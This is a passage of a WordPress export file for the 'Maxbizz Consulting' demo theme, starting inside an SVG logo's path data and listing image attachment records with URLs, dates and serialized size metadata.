	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/entering-the-next-phase-of-digital-transformation/post/</link>
		<pubDate>Fri, 04 Sep 2020 07:21:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/post.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>417</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 07:21:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 07:21:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[post]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>413</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/post.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/post.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:350;s:4:"file";s:16:"2020/09/post.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:16:"post-300x121.jpg";s:5:"width";i:300;s:6:"height";i:121;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:16:"post-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:16:"post-768x309.jpg";s:5:"width";i:768;s:6:"height";i:309;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:16:"post-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:16:"post-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-video</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/the-future-of-retail-asias-ecosystems/bg-video/</link>
		<pubDate>Fri, 04 Sep 2020 09:00:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-video.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>432</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:00:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:00:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-video]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>430</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-video.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-video.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:20:"2020/09/bg-video.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:20:"bg-video-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"bg-video-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"bg-video-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-video-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-video-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/how-to-write-a-successful-grant-application/gallery-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>438</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:21:"2020/09/gallery-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"gallery-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"gallery-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"gallery-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/how-to-write-a-successful-grant-application/gallery-2/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>439</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:21:"2020/09/gallery-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"gallery-2-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"gallery-2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"gallery-2-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-2-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/how-to-write-a-successful-grant-application/gallery-3/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>440</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:21:"2020/09/gallery-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"gallery-3-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"gallery-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"gallery-3-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-3-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>blog-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/contactless-payments-time-has-come/blog-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/blog-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>448</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>447</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/blog-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/blog-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:18:"2020/09/blog-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:18:"blog-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"blog-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"blog-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"blog-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"blog-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>author-widget</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/author-widget/</link>
		<pubDate>Fri, 04 Sep 2020 09:10:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/author-widget.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>451</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:10:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:10:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[author-widget]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/author-widget.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/author-widget.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:150;s:6:"height";i:150;s:4:"file";s:25:"2020/09/author-widget.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/contacts/pheader-contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>457</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>455</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-contacts.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/09/pheader-contacts.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-contacts-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-contacts-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-contacts-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-contacts-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-contacts-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-contacts-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-contacts-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"pheader-contacts-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"pheader-contacts-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/contacts/image-contacts/</link>
		<pubDate>Fri, 04 Sep 2020 10:51:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image-contacts.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>465</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 10:51:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 10:51:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>455</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image-contacts.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image-contacts.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
